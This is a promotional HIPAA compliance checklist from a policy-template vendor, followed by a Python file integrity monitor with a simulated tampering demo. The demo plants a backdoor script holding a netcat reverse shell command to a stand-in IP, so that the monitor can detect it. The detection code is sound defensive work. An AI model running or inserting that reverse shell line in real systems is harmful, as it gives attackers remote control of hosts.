HIPAA 11 Step Checklist for Covered Entities and Business Associates

Healthcare breaches are seemingly everywhere today, from stolen laptops to cyber-attacks that take out entire data centers, and it's only going to get worse as businesses continue to ignore the warning signs flashing every day like road hazards on a construction site. Here's what you need to know about becoming HIPAA compliant, and about putting I.T. best practices in place, courtesy of Flat Iron Technologies, LLC, the nation's leading provider of HIPAA policies and compliance templates and toolkits.


1. Assign Responsibilities: In today's world of regulatory compliance, it's more important than ever to assign roles and responsibilities for HIPAA compliance, and the Security Rule itself requires that a security official be identified and made responsible for developing and implementing the required policies and procedures. Without an internal "champion" driving compliance, HIPAA, or any other compliance mandate, comes to an absolute screeching halt. Ask yourself who inside your company has the knowledge and expertise to drive the HIPAA compliance bus. You'll be surprised at the number of individuals willing to pitch in and make a difference.

If you're short on staff and need assistance, reach out to a handful of consulting and compliance firms that can assist with all aspects of HIPAA compliance, from performing a readiness assessment to developing policies and procedures, and much more. Remember, it's not an overnight process; it takes time and a tremendous amount of effort to get you where you need to be, so call us at 1-800-554-1829 to learn more about our HIPAA services, and visit hipaapoliciesandprocedures.com today.

2. Develop Policies and Procedures: Question: What's the biggest, most difficult, and most time-consuming aspect of becoming compliant with the Health Insurance Portability and Accountability Act (HIPAA)? Answer: You guessed it, HIPAA policies and procedures! Nobody wants to spend endless days and nights authoring policy documentation for regulatory compliance, so do what other companies have been doing and download the HIPAA Policy Packets today from hipaapoliciesandprocedures.com. Developing policies and procedures is often the most demanding part of HIPAA compliance, so "going it alone" and writing the documents from scratch is an incredibly large effort with a very high failure rate. Whatever your industry, from pharmaceutical companies to managed care for senior citizens, we have the very best documentation available for instant download today at hipaapoliciesandprocedures.com.

3. Acquire Necessary Security Tools: From File Integrity Monitoring (FIM) to anti-virus software, Intrusion Detection Systems (IDS) and much more, compliance with HIPAA ultimately means obtaining the software and other security tools that create true defense-in-depth, layered security. The HIPAA Security Rule is written to be technology-neutral, so it does not name specific products, but its technical safeguards (access control, audit controls, integrity controls, person or entity authentication, and transmission security) simply cannot be met in a modern environment without tools of this kind: you cannot prove that ePHI has not been improperly altered or destroyed without integrity monitoring, and you cannot review activity in systems containing ePHI without logging and audit tooling. What products do you need? What vendors should you be speaking with? Are there free and open source tools that will do the job? Good questions for which you need answers, and we can help.

4. Implement Security Awareness Training: Security awareness training is a required standard of the HIPAA Security Rule for all members of the workforce, and rightfully so, as training employees on critical security issues just makes sense. It also creates a high degree of employee awareness in today's world of growing cybersecurity threats and challenges. Remember, employees are still your best defense when it comes to protecting organizational assets. All the security products in the world, your firewalls, anti-virus, intrusion detection systems and others, mean essentially nothing if you don't have knowledgeable and well-trained employees who truly understand today's threats, from phishing e-mail to the lost or stolen laptop that so often starts a breach.

Training employees on today's security threats and best practices is absolutely essential, and it's why we offer two (2) options: first, a 52-page training manual, and second, a PowerPoint slide presentation for group training. Security awareness training should be efficient, cost-effective, and highly valuable, and that's exactly what we offer. Visit hipaapoliciesandprocedures.com today to download high-quality, easy-to-use security awareness training documentation.

5. Undertake an Annual Risk Assessment: Assessing risk is a common theme in today's world of regulatory compliance. The HIPAA Security Rule requires an accurate and thorough risk analysis of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of ePHI, and it requires that the analysis be kept current; performing it at least annually, and again after any significant change to systems or operations, is the accepted way to meet that requirement. Beyond the mandate, it's a best practice that just makes sense. Don't you think it's a good idea to assess critical organization-wide risks on a regular basis, those that can impact your business in both the short term and the long term? Of course it is, and it's why we offer a comprehensive, easy-to-use risk assessment program available for instant download today.

Managing risks in today's hostile and ever-changing world is fast becoming one of the most important initiatives any business can undertake, and it's therefore critically important to perform a risk assessment every calendar year. And remember, it doesn't have to be a laborious academic exercise; simply use our industry-leading documentation, which lets you pick and choose from a wide selection of risk topics and categories. From information security risks to market risks, credit risks, financial risks and many others, there's a wide variety of risk topics to consider when performing your annual risk assessment. For HIPAA purposes, though, the risk analysis must at minimum cover every system, application, device, and workflow that creates, receives, maintains, or transmits ePHI, the threats to each, the controls already in place, and the likelihood and impact of each threat being realized, with the findings documented and the identified risks tracked to remediation.

6. Assess Third Party Security and Compliance: We live in a world of constant outsourcing, where one company is providing services to another, and that means certain due-diligence measures need to be in place to ensure the safety and security of PHI. Ask yourself this: What services are we outsourcing, and what specific rights do those providers have when it comes to accessing our information systems that may contain PHI, or that have the ability to impact the safety and security of PHI? You may be surprised at your answers! Remember that any vendor that creates, receives, maintains, or transmits PHI on your behalf is a business associate under HIPAA, and you must have a signed business associate agreement (BAA) with it before PHI changes hands; the BAA is a required contract, not optional paperwork, and a business associate is in turn responsible for the subcontractors it shares PHI with. Keep an inventory of those vendors, what PHI each one touches, and how their access is granted, reviewed, and revoked.

7. Time for a Culture Change: Hey, nobody likes change, we get it, but when it comes to the strict regulatory compliance requirements placed on businesses in today's world, change HAS to happen, no question about it. For HIPAA, it means following policies and procedures, undertaking risk assessments and training, effectively doing all the things that need to be done to ensure HIPAA compliance. It all starts by obtaining the very best policy templates for HIPAA compliance, which we offer for instant download today at hipaapoliciesandprocedures.com.

8. HIPAA is a Moving Target: And a moving target, particularly in today's world of regulatory compliance, can be incredibly difficult to hit if you're not working toward HIPAA compliance on an ongoing basis. Remember, HIPAA is not a "one and done" activity; it requires constant attention and dedication year after year, essentially doing everything you can to ensure the safety of Protected Health Information (PHI). New systems, new vendors, new staff, and new threats all change your exposure, and the regulations and enforcement guidance themselves evolve. It's extremely difficult, almost impossible, to be 100% compliant 100% of the time, we more than understand, but that's exactly why you have to keep aiming at the HIPAA target all the time.

9. Have a HIPAA Champion: Anything in life that requires change means there has to be a culture shift; more specifically, people have to want to change their outlook and how they do things on a daily basis. For HIPAA compliance, businesses need a major culture change: they need to understand the importance of protecting PHI and what controls need to be in place. Ultimately, this requires an internal "champion", a true advocate for HIPAA compliance with the authority to get policies adopted and the persistence to keep them followed.

10. Practice what you Preach: Hey, talk is cheap, as the old saying goes, so it's important to practice what you preach, which means that your policies and procedures are not just printed words on a document; they're the standard all employees must follow and adhere to, and an auditor or investigator will test whether what you actually do matches what your policies say. This can take some getting used to, as a true cultural change will have to happen, but it's got to be done to ensure compliance with HIPAA, not to mention that it just makes sense from a best-practice perspective in today's digital world. Visit hipaapoliciesandprocedures.com to learn more about the very best healthcare compliance documentation found anywhere today.

11. Continuous Monitoring is a Must: "Continuous monitoring" means assessing, enhancing, and changing your internal control environment as necessary, on an ongoing basis rather than once a year. It's about ensuring that your internal control policies, procedures, and processes are in good working order and actually protecting organizational assets: reviewing audit logs for systems containing ePHI, watching for unauthorized changes to files and configurations, confirming that user accounts are removed when people leave, and verifying that the controls you documented are still operating. With data breaches occurring at an alarming rate in today's digital society, you've got to be doing all you can to protect PHI and other highly confidential patient data. Continuous monitoring requires a true ideological shift in how companies work and operate, so it's not an overnight process, but once implemented, it yields significant results.
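The File Integrity Monitoring named in step 3 is the most concrete piece of the continuous monitoring described in step 11, so here is a small working FIM in Python as an added example; it is not code from this page, from Flat Iron Technologies, or from any product mentioned here. It builds a SHA-256 baseline of a directory tree, stores it under an HMAC so that an attacker who alters a file cannot quietly alter the baseline to match, and then reports files that were modified, added, or removed. The directory contents, the tampering, and the HMAC key are all constructed for the demonstration; in production the key and the baseline file would be kept off the monitored host.

```python
"""Minimal file integrity monitor: hash a tree, store an HMAC-protected baseline,
and diff the live tree against it. Added example, not code from the original page."""
from __future__ import annotations

import hashlib
import hmac
import json
import os
import tempfile
from pathlib import Path


def _sha256(path: Path) -> str:
    """Stream the file through SHA-256 so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict[str, dict]:
    """Map each regular file (path relative to root) to its hash, size and mode.
    Symlinks are skipped so a planted link cannot pull in a file outside the tree."""
    baseline: dict[str, dict] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            st = p.stat()
            baseline[p.relative_to(root).as_posix()] = {
                "sha256": _sha256(p),
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o777),  # permission changes count as tampering
            }
    return baseline


def save_baseline(baseline: dict[str, dict], path: Path, key: bytes) -> None:
    """Write the baseline as one JSON line followed by an HMAC-SHA256 over that line."""
    body = json.dumps(baseline, sort_keys=True)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    path.write_text(body + "\n" + tag + "\n")


def load_baseline(path: Path, key: bytes) -> dict[str, dict]:
    """Refuse to use a baseline whose HMAC no longer matches: someone edited it."""
    body, tag = path.read_text().rstrip("\n").rsplit("\n", 1)
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("baseline file failed HMAC check: possible tampering")
    return json.loads(body)


def compare(baseline: dict[str, dict], root: Path) -> dict[str, list[str]]:
    """Return the files whose hash/size/mode changed, appeared, or disappeared."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo() -> dict:
    """Constructed scenario: baseline a small tree, tamper with it, then detect the
    changes and an attempt to rewrite the baseline so the tampering would be hidden."""
    key = b"demo-only-key-keep-the-real-one-off-the-monitored-host"  # constructed
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "tree"
        (root / "etc").mkdir(parents=True)
        (root / "bin").mkdir()
        (root / "etc" / "app.conf").write_text("db_host=10.0.0.5\n")   # constructed
        (root / "etc" / "users.txt").write_text("alice\nbob\n")        # constructed
        (root / "bin" / "run.sh").write_text("#!/bin/sh\nexec ./app\n")  # constructed
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(build_baseline(root), baseline_file, key)

        # Simulated intrusion: an account is added, a script is replaced by a backdoor.
        (root / "etc" / "users.txt").write_text("alice\nbob\nmallory\n")
        (root / "bin" / "run.sh").unlink()
        (root / "bin" / "backdoor.sh").write_text("#!/bin/sh\nnc 203.0.113.9 4444 -e /bin/sh\n")
        report = compare(load_baseline(baseline_file, key), root)

        # The intruder then edits the baseline to match; the HMAC check catches it.
        baseline_file.write_text(baseline_file.read_text().replace("bin/run.sh", "bin/backdoor.sh"))
        try:
            load_baseline(baseline_file, key)
            baseline_tamper_detected = False
        except ValueError:
            baseline_tamper_detected = True
        return {"report": report, "baseline_tamper_detected": baseline_tamper_detected}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In a real deployment the comparison runs on a schedule (or from an inotify/auditd hook), the baseline is refreshed only through change control, and each "modified" or "added" hit on a path holding ePHI or system binaries is routed to whoever reviews the audit logs, which is the day-to-day substance of continuous monitoring.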

Lastly, you may very well find yourself having to demonstrate or show proof of HIPAA compliance to customers, partners, or regulators. This can be successfully achieved with the following three (3) reporting options:

1. HIPAA AUP Assessment: An "AUP" is an agreed-upon procedures engagement performed by a Certified Public Accountant (CPA) firm under the AICPA attestation standards. The CPA performs specific procedures that you and the intended users of the report have agreed on, for a subject matter such as HIPAA, and reports the factual findings of those procedures; unlike an audit, the CPA does not express an opinion or conclusion, so the report is only as useful as the procedures you agree on.

2. SOC 2 Audit with HIPAA Provisions: The System and Organization Controls (SOC) reporting framework, put forth by the American Institute of Certified Public Accountants (AICPA), is one of the most widely recognized third-party assessment frameworks for evaluating an organization's internal controls. A SOC 2 examination is performed against the AICPA Trust Services Criteria (security, availability, processing integrity, confidentiality, and privacy), and the requirements of the HIPAA Security Rule and Privacy Rule can be included as additional subject matter (commonly called a SOC 2+ report) so that both are assessed in the same engagement. With two (2) types of SOC 2 reports, a Type 1 covering the design of controls at a point in time and a Type 2 covering design and operating effectiveness over a period (typically six to twelve months), healthcare providers and their business associates can provide assurances about their HIPAA-related controls using a globally accepted reporting platform; a Type 2 is what most customers ultimately ask for.

3. SOC 2 Audit covering HIPAA/HITRUST Provisions: The HITRUST CSF is probably the most in-depth and demanding set of requirements when it comes to regulatory compliance for the healthcare industry, because the framework itself is extremely comprehensive and already maps HIPAA requirements into its controls. Through the AICPA/HITRUST collaboration, the HITRUST CSF criteria can be reported on within a SOC 2 examination, so undertaking HITRUST via a SOC 2 assessment will incorporate a large number of the mandated HIPAA requirements, allowing you to demonstrate compliance with the Health Insurance Portability and Accountability Act provisions at the same time. Note that a SOC 2 report covering HITRUST criteria is distinct from HITRUST CSF certification, which is issued by HITRUST itself.